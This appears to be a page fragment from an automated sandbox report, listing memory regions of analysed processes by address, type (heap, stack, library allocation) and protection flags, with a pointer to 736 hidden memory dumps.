trusted library allocation
|
page execute and read and write
|
||
|
1A8605A1000
|
heap
|
page read and write
|
||
|
1A85E58C000
|
heap
|
page read and write
|
||
|
742BFB000
|
stack
|
page read and write
|
||
|
2096F4A8000
|
heap
|
page read and write
|
||
|
28548258000
|
heap
|
page read and write
|
||
|
577E000
|
stack
|
page read and write
|
||
|
1A8605A2000
|
heap
|
page read and write
|
||
|
2096EEE7000
|
heap
|
page execute and read and write
|
||
|
2854A267000
|
heap
|
page read and write
|
||
|
1C5803E0000
|
trusted library allocation
|
page read and write
|
||
|
2B8BCA2E000
|
heap
|
page read and write
|
||
|
7FFD9B8D0000
|
trusted library allocation
|
page read and write
|
||
|
1A860FE1000
|
heap
|
page read and write
|
||
|
2854A26B000
|
heap
|
page read and write
|
||
|
1A8606E0000
|
heap
|
page read and write
|
||
|
645DC4B000
|
stack
|
page read and write
|
||
|
1A8610D1000
|
heap
|
page read and write
|
||
|
2B8BCA64000
|
heap
|
page read and write
|
||
|
1A860267000
|
heap
|
page read and write
|
||
|
F6287FF000
|
stack
|
page read and write
|
||
|
18B2842B000
|
heap
|
page read and write
|
||
|
2B8BCB31000
|
heap
|
page read and write
|
||
|
32DA000
|
trusted library allocation
|
page read and write
|
||
|
1A86024E000
|
heap
|
page read and write
|
||
|
32FF000
|
trusted library allocation
|
page read and write
|
||
|
F7B000
|
stack
|
page read and write
|
||
|
1A8605AF000
|
heap
|
page read and write
|
||
|
1A860599000
|
heap
|
page read and write
|
||
|
2B8BCA89000
|
heap
|
page read and write
|
||
|
1A86024E000
|
heap
|
page read and write
|
||
|
2096EE00000
|
trusted library allocation
|
page read and write
|
||
|
2096F6B0000
|
heap
|
page read and write
|
||
|
2854A22B000
|
heap
|
page read and write
|
||
|
1C580001000
|
trusted library allocation
|
page read and write
|
||
|
32D4000
|
trusted library allocation
|
page read and write
|
||
|
20900169000
|
trusted library allocation
|
page read and write
|
||
|
1A85E570000
|
heap
|
page read and write
|
||
|
1A8605EA000
|
heap
|
page read and write
|
||
|
18B26575000
|
heap
|
page read and write
|
||
|
2B8BCA7D000
|
heap
|
page read and write
|
||
|
2B8BAB80000
|
heap
|
page read and write
|
||
|
28548230000
|
heap
|
page read and write
|
||
|
18B28453000
|
heap
|
page read and write
|
||
|
2B8BC931000
|
heap
|
page read and write
|
||
|
2854A258000
|
heap
|
page read and write
|
||
|
2854A210000
|
heap
|
page read and write
|
||
|
4D94C7F000
|
stack
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
|
1A85E390000
|
heap
|
page read and write
|
||
|
18B28459000
|
heap
|
page read and write
|
||
|
2854A23B000
|
heap
|
page read and write
|
||
|
1A860223000
|
heap
|
page read and write
|
||
|
1A85E560000
|
heap
|
page read and write
|
||
|
5F5D000
|
trusted library allocation
|
page read and write
|
||
|
2854A26B000
|
heap
|
page read and write
|
||
|
1680000
|
heap
|
page read and write
|
||
|
15DA000
|
trusted library allocation
|
page execute and read and write
|
||
|
28548259000
|
heap
|
page read and write
|
||
|
2090048F000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8B0000
|
trusted library allocation
|
page read and write
|
||
|
2B8BCA83000
|
heap
|
page read and write
|
||
|
1A85E551000
|
heap
|
page read and write
|
||
|
2854A1E6000
|
heap
|
page read and write
|
||
|
20675980000
|
heap
|
page read and write
|
||
|
F6286FA000
|
stack
|
page read and write
|
||
|
28548250000
|
heap
|
page read and write
|
||
|
18B27FB4000
|
heap
|
page read and write
|
||
|
1A85E55A000
|
heap
|
page read and write
|
||
|
15E0000
|
trusted library allocation
|
page read and write
|
||
|
645CBFE000
|
stack
|
page read and write
|
||
|
7FFD9B726000
|
trusted library allocation
|
page execute and read and write
|
||
|
FC579FF000
|
stack
|
page read and write
|
There are 736 hidden memdumps, click here to show them.